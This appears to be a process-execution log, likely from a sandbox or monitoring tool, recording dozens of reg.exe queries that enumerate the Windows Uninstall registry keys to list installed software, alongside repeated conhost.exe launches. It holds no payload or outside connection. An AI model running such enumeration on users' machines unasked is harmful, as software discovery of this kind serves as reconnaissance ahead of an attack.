C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge Update"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft EdgeWebView"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4d8dcf8c-a72a-43e1-9833-c12724db736e}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{61087a79-ac85-455c-934d-1fa22cc64f36}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{63880b41-04fc-4f9b-92c4-4455c255eb8c}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7DAD0258-515C-3DD4-8964-BD714199E0F7}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BF08E976-B92E-4336-B56F-2171179476C4}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d87ae0f4-64a6-4b94-859a-530b9c313c27}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef5af41f-d68c-48f7-bfb0-5055718601fc}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F6080405-9FA8-4CAA-9982-14E95D1A3DAC}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\36c3a589-07cb-5a5c-93f2-7ca0c417a328
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge Update"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft EdgeWebView"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2
C:\Windows\system32\reg.exe
